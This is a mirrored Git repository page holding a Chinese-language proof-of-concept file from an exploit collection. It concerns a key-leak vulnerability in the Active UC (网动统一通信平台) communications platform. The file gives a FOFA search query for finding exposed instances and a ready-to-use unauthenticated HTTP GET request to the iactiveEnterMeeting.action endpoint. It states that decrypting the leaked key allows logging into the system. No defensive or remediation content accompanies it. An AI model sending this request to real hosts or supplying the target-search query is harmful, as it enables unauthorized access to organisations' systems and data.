admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-07 19:35:52 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/网动统一通信平台/网动统一通信平台iactiveEnterMeeting存在密钥泄露漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

1.4 KiB
Raw Blame History

网动统一通信平台iactiveEnterMeeting存在密钥泄露漏洞

一、漏洞简介

网动统一通信平台是一个涵盖了多种通信功能的综合平台通常包括文字、语音、视频通讯等功能并且可能提供了一系列的通讯工具和服务。这样的平台通常旨在提升用户的沟通效率和便利性为用户提供一个统一的通信环境。网动统一通信平台iactiveEnterMeeting存在密钥泄露漏洞

二、影响版本

  • 网动统一通信平台

三、资产测绘

  • fofatitle="网动统一通信平台(Active UC)"
  • 特征

1715181346183-38fe9fce-95da-4fcc-9444-e758323b5b48.png

四、漏洞复现

GET /acenter/iactiveEnterMeeting.action?roomid=1&username=admin HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36

1728895972113-cd2610be-9b1a-425a-a4c5-db5f41756e26.png

解密后可登录系统

1728896161193-80cbf6bb-9a72-40fa-90e6-0b901c7ad4d7.png

更新: 2024-10-22 09:40:55
原文: https://www.yuque.com/xiaokp7/ocvun2/rq6gi25kn08phghs